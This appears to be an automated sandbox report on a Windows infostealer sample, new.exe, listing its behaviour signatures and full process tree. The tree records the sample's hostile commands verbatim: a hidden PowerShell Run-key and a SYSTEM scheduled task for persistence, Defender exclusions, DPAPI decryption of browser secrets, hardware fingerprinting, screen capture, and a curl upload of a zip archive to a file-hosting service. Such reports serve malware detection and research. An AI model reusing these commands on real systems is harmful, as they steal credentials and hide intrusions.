Analysis Overview
SHA256
dcfefc6ab68f29b9b2d1119bff758dd024d922b5ec7fa7d70110e50807863d86
Threat Level: Likely malicious
The file new.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Hide Artifacts: Hidden Window
An obfuscated cmd.exe command-line is typically used to evade detection.
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Modifies registry class
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates processes with tasklist
Modifies registry key
Detects videocard installed
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 13:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 13:26
Reported
2024-06-26 13:29
Platform
win7-20231129-en
Max time kernel
121s
Max time network
123s
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\new.exe
"C:\Users\Admin\AppData\Local\Temp\new.exe"
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 13:26
Reported
2024-06-26 13:35
Platform
win10v2004-20240611-en
Max time kernel
510s
Max time network
511s
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\new.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\wpesfcWHQdjImlV.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\new.exe" | C:\Windows\system32\reg.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638820123539450" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2080292272-204036150-2159171770-1000\{D4AA11F1-ED75-48B5-B3E5-B92618C61393} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\new.exe
"C:\Users\Admin\AppData\Local\Temp\new.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4083.tmp" "c:\Users\Admin\AppData\Local\Temp\coslunty\CSC49F411F94BF644DD95F3BEBC997E183B.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,195,99,235,182,41,198,84,212,5,112,236,23,129,1,60,104,29,197,138,50,109,201,30,151,124,56,12,89,160,180,3,89,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,39,180,155,90,37,170,60,44,223,112,132,8,15,229,152,114,124,246,192,150,32,0,35,43,238,155,16,16,236,186,157,90,48,0,0,0,177,251,243,119,212,141,235,68,112,105,50,243,179,182,19,216,174,70,198,184,22,251,119,90,133,31,215,205,65,184,38,3,56,152,61,177,135,206,155,5,101,121,221,236,41,48,216,110,64,0,0,0,33,238,94,131,29,161,30,37,48,154,3,214,231,53,178,59,97,233,95,68,208,3,112,65,68,159,31,96,242,13,199,184,68,105,38,97,211,91,197,240,77,80,166,18,251,19,195,253,160,146,122,83,231,191,109,69,45,179,226,170,69,106,202,205), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,195,99,235,182,41,198,84,212,5,112,236,23,129,1,60,104,29,197,138,50,109,201,30,151,124,56,12,89,160,180,3,89,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,39,180,155,90,37,170,60,44,223,112,132,8,15,229,152,114,124,246,192,150,32,0,35,43,238,155,16,16,236,186,157,90,48,0,0,0,177,251,243,119,212,141,235,68,112,105,50,243,179,182,19,216,174,70,198,184,22,251,119,90,133,31,215,205,65,184,38,3,56,152,61,177,135,206,155,5,101,121,221,236,41,48,216,110,64,0,0,0,33,238,94,131,29,161,30,37,48,154,3,214,231,53,178,59,97,233,95,68,208,3,112,65,68,159,31,96,242,13,199,184,68,105,38,97,211,91,197,240,77,80,166,18,251,19,195,253,160,146,122,83,231,191,109,69,45,179,226,170,69,106,202,205), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,187,214,93,191,165,145,124,208,125,156,123,55,92,81,194,103,130,179,188,3,138,200,215,116,51,207,168,41,119,206,207,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,83,20,158,35,74,100,154,174,172,225,107,117,40,60,70,192,35,99,230,178,157,155,80,73,18,213,71,223,77,175,63,33,48,0,0,0,13,133,31,237,34,64,21,96,170,195,161,22,8,183,3,167,57,236,114,155,196,92,108,168,224,135,126,49,88,70,103,53,51,166,54,11,80,116,117,189,158,135,75,122,113,205,217,85,64,0,0,0,70,31,186,231,151,247,209,28,35,149,68,246,37,82,207,237,24,206,106,36,231,97,180,96,159,100,227,208,26,108,196,241,4,130,203,135,202,174,146,151,229,116,109,195,208,207,142,240,241,220,125,96,81,91,93,112,41,35,47,152,249,109,84,136), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,187,214,93,191,165,145,124,208,125,156,123,55,92,81,194,103,130,179,188,3,138,200,215,116,51,207,168,41,119,206,207,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,83,20,158,35,74,100,154,174,172,225,107,117,40,60,70,192,35,99,230,178,157,155,80,73,18,213,71,223,77,175,63,33,48,0,0,0,13,133,31,237,34,64,21,96,170,195,161,22,8,183,3,167,57,236,114,155,196,92,108,168,224,135,126,49,88,70,103,53,51,166,54,11,80,116,117,189,158,135,75,122,113,205,217,85,64,0,0,0,70,31,186,231,151,247,209,28,35,149,68,246,37,82,207,237,24,206,106,36,231,97,180,96,159,100,227,208,26,108,196,241,4,130,203,135,202,174,146,151,229,116,109,195,208,207,142,240,241,220,125,96,81,91,93,112,41,35,47,152,249,109,84,136), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4769.tmp" "c:\Users\Admin\AppData\Local\Temp\lssg30o3\CSC88193676E09C4075BE3495B5E738BB2C.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\new.exe" /f
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Tmuacblb.zip";"
C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Tmuacblb.zip";
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
